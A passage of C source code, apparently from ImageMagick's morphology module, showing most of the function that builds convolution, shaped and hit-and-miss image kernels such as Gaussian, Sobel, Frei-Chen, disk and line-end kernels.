% and default is 2, producing a 5x5 kernel.
%
% Euclidean:[{radius}][x{scale}[%!]]
% Euclidean distance is the 'direct' or 'as the crow flies' distance.
% However by default the kernel size only has a radius of 1, which
% limits the distance to 'Knight' like moves, with only orthogonal and
% diagonal measurements being correct. As such for the default kernel
% you will get an octagonal-like distance function.
%
% However using a larger radius such as "Euclidean:4" you will get a
% much smoother distance gradient from the edge of the shape, especially
% if the image is pre-processed to include any anti-aliasing pixels.
% Of course a larger kernel is slower to use, and not always needed.
%
% The first three Distance Measuring Kernels will only generate distances
% of exact multiples of {scale} in binary images. As such you can use a
% scale of 1 without losing any information. However you also need some
% scaling when handling non-binary anti-aliased shapes.
%
% The "Euclidean" Distance Kernel however does generate a non-integer
% fractional results, and as such scaling is vital even for binary shapes.
%
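% For example (a usage sketch, based on the flag handling above), a
% 'Distance' morphology with "Euclidean:4,100" scales each distance step
% by 100, while "Euclidean:4,100!" (the '!' flag) spreads roughly that
% many steps across the full QuantumRange instead.
%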
*/
MagickExport KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
const GeometryInfo *args)
{
KernelInfo
*kernel;
register ssize_t
i;
register ssize_t
u,
v;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
/* Generate a new empty kernel if needed */
kernel=(KernelInfo *) NULL;
switch(type) {
case UndefinedKernel: /* These should not call this function */
case UserDefinedKernel:
assert("Should not call this function" != (char *)NULL);
break;
case LaplacianKernel: /* Named Discrete Convolution Kernels */
case SobelKernel: /* these are defined using other kernels */
case RobertsKernel:
case PrewittKernel:
case CompassKernel:
case KirschKernel:
case FreiChenKernel:
case EdgesKernel: /* Hit and Miss kernels */
case CornersKernel:
case DiagonalsKernel:
case LineEndsKernel:
case LineJunctionsKernel:
case RidgesKernel:
case ConvexHullKernel:
case SkeletonKernel:
case ThinSEKernel:
break; /* A pre-generated kernel is not needed */
#if 0
/* set to 1 to do a compile-time check that we haven't missed anything */
case UnityKernel:
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case BlurKernel:
case CometKernel:
case DiamondKernel:
case SquareKernel:
case RectangleKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
case RingKernel:
case PeaksKernel:
case ChebyshevKernel:
case ManhattanKernel:
case OctagonalKernel:
case EuclideanKernel:
#else
default:
#endif
/* Generate the base Kernel Structure */
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = type;
kernel->next = (KernelInfo *) NULL;
kernel->signature = MagickSignature;
break;
}
switch(type) {
/*
Convolution Kernels
*/
case UnityKernel:
{
kernel->height = kernel->width = (size_t) 1;
kernel->x = kernel->y = (ssize_t) 0;
kernel->values=(double *) AcquireQuantumMemory(1,sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
kernel->maximum = kernel->values[0] = args->rho;
break;
}
case GaussianKernel:
case DoGKernel:
case LoGKernel:
{ double
sigma = fabs(args->sigma),
sigma2 = fabs(args->xi),
A, B, R;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else if ( (type != DoGKernel) || (sigma >= sigma2) )
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma);
else
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma2);
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* WARNING: The following generates a 'sampled gaussian' kernel.
* What we really want is a 'discrete gaussian' kernel.
*
* How to do this I don't know, but it appears to be based on the
* Error Function 'erf()' (the integral of a gaussian)
*/
if ( type == GaussianKernel || type == DoGKernel )
{ /* Calculate a Gaussian, OR positive half of a DoG */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
if ( type == DoGKernel )
{ /* Subtract a Negative Gaussian for "Difference of Gaussian" */
if ( sigma2 > MagickEpsilon )
{ sigma = sigma2; /* simplify loop expressions */
A = 1.0/(2.0*sigma*sigma);
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] -= exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
kernel->values[kernel->x+kernel->y*kernel->width] -= 1.0;
}
if ( type == LoGKernel )
{ /* Calculate a Laplacian of a Gaussian - Or Mexician Hat */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(MagickPI*sigma*sigma*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ R = ((double)(u*u+v*v))*A;
kernel->values[i] = (1-R)*exp(-R)*B;
}
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
/* Note the above kernels may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (< 0.1) the central value becomes larger than one, thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 2D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
break;
}
case BlurKernel:
{ double
sigma = fabs(args->sigma),
alpha, beta;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else
kernel->width = GetOptimalKernelWidth1D(args->rho,sigma);
kernel->height = 1;
kernel->x = (ssize_t) (kernel->width-1)/2;
kernel->y = 0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
#if 1
#define KernelRank 3
/* Formula derived from GetBlurKernel() in "effect.c" (plus bug fix).
** It generates a gaussian 3 times the width, and compresses it into
** the expected range. This produces a closer normalization of the
** resulting kernel, especially for very low sigma values.
** As such, while weird, it is preferred.
**
** I am told this method originally came from Photoshop.
**
** A properly normalized curve is generated (apart from edge clipping)
** even though we later normalize the result (for edge clipping)
** to allow the correct generation of a "Difference of Blurs".
*/
/* initialize */
v = (ssize_t) (kernel->width*KernelRank-1)/2; /* start/end points to fit range */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
/* Calculate a Positive 1D Gaussian */
if ( sigma > MagickEpsilon )
{ sigma *= KernelRank; /* simplify loop expressions */
alpha = 1.0/(2.0*sigma*sigma);
beta= (double) (1.0/(MagickSQ2PI*sigma ));
for ( u=-v; u <= v; u++) {
kernel->values[(u+v)/KernelRank] +=
exp(-((double)(u*u))*alpha)*beta;
}
}
else /* special case - generate a unity kernel */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
#else
/* Direct calculation without curve averaging */
/* Calculate a Positive Gaussian */
if ( sigma > MagickEpsilon )
{ alpha = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
beta = 1.0/(MagickSQ2PI*sigma);
for ( i=0, u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u))*alpha)*beta;
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
#endif
/* Note the above kernel may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (< 0.1) the central value becomes larger than one, thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 1D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
/* rotate the 1D kernel by given angle */
RotateKernelInfo(kernel, args->xi );
break;
}
case CometKernel:
{ double
sigma = fabs(args->sigma),
A;
if ( args->rho < 1.0 )
kernel->width = (GetOptimalKernelWidth1D(args->rho,sigma)-1)/2+1;
else
kernel->width = (size_t)args->rho;
kernel->x = kernel->y = 0;
kernel->height = 1;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* A comet blur is half a 1D gaussian curve, so that the object is
** blurred in one direction only. This may not be quite the right
** curve to use, so it may change in the future. The function must be
** normalized after generation, which also resolves any clipping.
**
** As we are normalizing and not subtracting gaussians,
** there is no need for a divisor in the gaussian formula.
**
** It is less complex.
*/
if ( sigma > MagickEpsilon )
{
#if 1
#define KernelRank 3
v = (ssize_t) kernel->width*KernelRank; /* start/end points */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*sizeof(double));
sigma *= KernelRank; /* simplify the loop expression */
A = 1.0/(2.0*sigma*sigma);
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( u=0; u < v; u++) {
kernel->values[u/KernelRank] +=
exp(-((double)(u*u))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
}
for (i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range += kernel->values[i];
#else
A = 1.0/(2.0*sigma*sigma); /* simplify the loop expression */
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range +=
kernel->values[i] =
exp(-((double)(i*i))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
#endif
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
}
kernel->minimum = 0.0;
kernel->maximum = kernel->values[0];
kernel->negative_range = 0.0;
ScaleKernelInfo(kernel, 1.0, NormalizeValue); /* Normalize */
RotateKernelInfo(kernel, args->xi); /* Rotate by angle */
break;
}
/*
Convolution Kernels - Well Known Named Constant Kernels
*/
case LaplacianKernel:
{ switch ( (int) args->rho ) {
case 0:
default: /* laplacian square filter -- default */
kernel=ParseKernelArray("3: -1,-1,-1 -1,8,-1 -1,-1,-1");
break;
case 1: /* laplacian diamond filter */
kernel=ParseKernelArray("3: 0,-1,0 -1,4,-1 0,-1,0");
break;
case 2:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
break;
case 3:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 1,-2,1");
break;
case 5: /* a 5x5 laplacian */
kernel=ParseKernelArray(
"5: -4,-1,0,-1,-4 -1,2,3,2,-1 0,3,4,3,0 -1,2,3,2,-1 -4,-1,0,-1,-4");
break;
case 7: /* a 7x7 laplacian */
kernel=ParseKernelArray(
"7:-10,-5,-2,-1,-2,-5,-10 -5,0,3,4,3,0,-5 -2,3,6,7,6,3,-2 -1,4,7,8,7,4,-1 -2,3,6,7,6,3,-2 -5,0,3,4,3,0,-5 -10,-5,-2,-1,-2,-5,-10" );
break;
case 15: /* a 5x5 LoG (sigma approx 1.4) */
kernel=ParseKernelArray(
"5: 0,0,-1,0,0 0,-1,-2,-1,0 -1,-2,16,-2,-1 0,-1,-2,-1,0 0,0,-1,0,0");
break;
case 19: /* a 9x9 LoG (sigma approx 1.4) */
/* http://www.cscjournals.org/csc/manuscript/Journals/IJIP/volume3/Issue1/IJIP-15.pdf */
kernel=ParseKernelArray(
"9: 0,-1,-1,-2,-2,-2,-1,-1,0 -1,-2,-4,-5,-5,-5,-4,-2,-1 -1,-4,-5,-3,-0,-3,-5,-4,-1 -2,-5,-3,12,24,12,-3,-5,-2 -2,-5,-0,24,40,24,-0,-5,-2 -2,-5,-3,12,24,12,-3,-5,-2 -1,-4,-5,-3,-0,-3,-5,-4,-1 -1,-2,-4,-5,-5,-5,-4,-2,-1 0,-1,-1,-2,-2,-2,-1,-1,0");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
break;
}
case SobelKernel:
{ /* Simple Sobel Kernel */
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case RobertsKernel:
{
kernel=ParseKernelArray("3: 0,0,0 1,-1,0 0,0,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case PrewittKernel:
{
kernel=ParseKernelArray("3: 1,0,-1 1,0,-1 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case CompassKernel:
{
kernel=ParseKernelArray("3: 1,1,-1 1,-2,-1 1,1,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case KirschKernel:
{
kernel=ParseKernelArray("3: 5,-3,-3 5,0,-3 5,-3,-3");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case FreiChenKernel:
/* Direction is set to be left to right positive */
/* http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf -- RIGHT? */
/* http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf -- WRONG? */
{ switch ( (int) args->rho ) {
default:
case 0:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +MagickSQ2;
kernel->values[5] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
break;
case 2:
kernel=ParseKernelArray("3: 1,2,0 2,0,-2 0,-2,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = kernel->values[3] = +MagickSQ2;
kernel->values[5] = kernel->values[7] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/(2.0*MagickSQ2)), NoValue);
break;
case 10:
kernel=AcquireKernelInfo("FreiChen:11;FreiChen:12;FreiChen:13;FreiChen:14;FreiChen:15;FreiChen:16;FreiChen:17;FreiChen:18;FreiChen:19");
if (kernel == (KernelInfo *) NULL)
return(kernel);
break;
case 1:
case 11:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +MagickSQ2;
kernel->values[5] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/(2.0*MagickSQ2)), NoValue);
break;
case 12:
kernel=ParseKernelArray("3: 1,2,1 0,0,0 1,2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = +MagickSQ2;
kernel->values[7] = +MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/(2.0*MagickSQ2)), NoValue);
break;
case 13:
kernel=ParseKernelArray("3: 2,-1,0 -1,0,1 0,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[0] = +MagickSQ2;
kernel->values[8] = -MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/(2.0*MagickSQ2)), NoValue);
break;
case 14:
kernel=ParseKernelArray("3: 0,1,-2 -1,0,1 2,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[2] = -MagickSQ2;
kernel->values[6] = +MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/(2.0*MagickSQ2)), NoValue);
break;
case 15:
kernel=ParseKernelArray("3: 0,-1,0 1,0,1 0,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 16:
kernel=ParseKernelArray("3: 1,0,-1 0,0,0 -1,0,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 17:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 -1,-2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 18:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 19:
kernel=ParseKernelArray("3: 1,1,1 1,1,1 1,1,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/3.0, NoValue);
break;
}
if ( fabs(args->sigma) > MagickEpsilon )
/* Rotate by correctly supplied 'angle' */
RotateKernelInfo(kernel, args->sigma);
else if ( args->rho > 30.0 || args->rho < -30.0 )
/* Rotate by out of bounds 'type' */
RotateKernelInfo(kernel, args->rho);
break;
}
/*
Boolean or Shaped Kernels
*/
case DiamondKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values within diamond area to scale given */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <= (long) kernel->x)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case SquareKernel:
case RectangleKernel:
{ double
scale;
if ( type == SquareKernel )
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = (size_t) (2*args->rho+1);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
scale = args->sigma;
}
else {
/* NOTE: user defaults set in "AcquireKernelInfo()" */
if ( args->rho < 1.0 || args->sigma < 1.0 )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->width = (size_t)args->rho;
kernel->height = (size_t)args->sigma;
if ( args->xi < 0.0 || args->xi > (double)kernel->width ||
args->psi < 0.0 || args->psi > (double)kernel->height )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->x = (ssize_t) args->xi;
kernel->y = (ssize_t) args->psi;
scale = 1.0;
}
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values to scale given */
u=(ssize_t) (kernel->width*kernel->height);
for ( i=0; i < u; i++)
kernel->values[i] = scale;
kernel->minimum = kernel->maximum = scale; /* a flat shape */
kernel->positive_range = scale*u;
break;
}
case OctagonKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <=
((long)kernel->x + (long)(kernel->x/2)) )
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case DiskKernel:
{
ssize_t
limit = (ssize_t)(args->rho*args->rho);
if (args->rho < 0.4) /* default radius approx 4.3 */
kernel->width = kernel->height = 9L, limit = 18L;
else
kernel->width = kernel->height = (size_t)fabs(args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ((u*u+v*v) <= limit)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case PlusKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along the axes to the given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == 0 || v == 0) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
case CrossKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along the diagonals to the given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == v || u == -v) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
/*
HitAndMiss Kernels
*/
case RingKernel:
case PeaksKernel:
{
ssize_t
limit1,
limit2,
scale;
if (args->rho < args->sigma)
{
kernel->width = ((size_t)args->sigma)*2+1;
limit1 = (ssize_t)(args->rho*args->rho);
limit2 = (ssize_t)(args->sigma*args->sigma);
}
else
{
kernel->width = ((size_t)args->rho)*2+1;
limit1 = (ssize_t)(args->sigma*args->sigma);
limit2 = (ssize_t)(args->rho*args->rho);
}
if ( limit2 <= 0 )
kernel->width = 7L, limit1 = 7L, limit2 = 11L;
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set a ring of points of 'scale' ( 0.0 for PeaksKernel ) */
scale = (ssize_t) (( type == PeaksKernel) ? 0.0 : args->xi);
for ( i=0, v= -kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ ssize_t radius=u*u+v*v;
if (limit1 < radius && radius <= limit2)
kernel->positive_range += kernel->values[i] = (double) scale;
else
kernel->values[i] = nan;
}
kernel->minimum = kernel->maximum = (double) scale;
if ( type == PeaksKernel ) {
/* set the central point in the middle */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
kernel->maximum = 1.0;
}
break;
}
case EdgesKernel:
{
kernel=AcquireKernelInfo("ThinSE:482");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandMirrorKernelInfo(kernel); /* mirror expansion of kernels */
break;
}
case CornersKernel:
{
kernel=AcquireKernelInfo("ThinSE:87");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* Expand 90 degree rotations */
break;
}
case DiagonalsKernel:
{
switch ( (int) args->rho ) {
case 0:
default:
{ KernelInfo
*new_kernel;
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
new_kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
ExpandMirrorKernelInfo(kernel);
return(kernel);
}
case 1:
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
break;
case 2:
kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineEndsKernel:
{ /* Kernels for finding the end of thin lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all end of lines */
return(AcquireKernelInfo("LineEnds:1>;LineEnds:2>"));
case 1:
/* kernel for 4-connected line ends - no rotation */
kernel=ParseKernelArray("3: 0,0,- 0,1,1 0,0,-");
break;
case 2:
/* kernel to add for 8-connected lines - no rotation */
kernel=ParseKernelArray("3: 0,0,0 0,1,0 0,0,1");
break;
case 3:
/* kernel to add for orthogonal line ends - does not find corners */
kernel=ParseKernelArray("3: 0,0,0 0,1,1 0,0,0");
break;
case 4:
/* traditional line end - fails on last T end */
kernel=ParseKernelArray("3: 0,0,0 0,1,- 0,0,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineJunctionsKernel:
{ /* kernels for finding the junctions of multiple lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all line junctions */
return(AcquireKernelInfo("LineJunctions:1@;LineJunctions:2>"));
case 1:
/* Y Junction */
kernel=ParseKernelArray("3: 1,-,1 -,1,- -,1,-");
break;
case 2:
/* Diagonal T Junctions */
kernel=ParseKernelArray("3: 1,-,- -,1,- 1,-,1");
break;
case 3:
/* Orthogonal T Junctions */
kernel=ParseKernelArray("3: -,-,- 1,1,1 -,1,-");
break;
case 4:
/* Diagonal X Junctions */
kernel=ParseKernelArray("3: 1,-,1 -,1,- 1,-,1");
break;
case 5:
/* Orthogonal X Junctions - minimal diamond kernel */
kernel=ParseKernelArray("3: -,1,- 1,1,1 -,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case RidgesKernel:
{ /* Ridges - Ridge finding kernels */
KernelInfo
*new_kernel;
switch ( (int) args->rho ) {
case 1:
default:
kernel=ParseKernelArray("3x1:0,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 2 rotated kernels (symmetrical) */
break;
case 2:
kernel=ParseKernelArray("4x1:0,1,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotated kernels */
/* Kernels to find a stepped 'thick' line, 4 rotates + mirrors */
/* Unfortunately we can not yet rotate a non-square kernel */
/* But then we can't flip a non-symmetrical kernel either */
new_kernel=ParseKernelArray("4x3+1+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+1+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
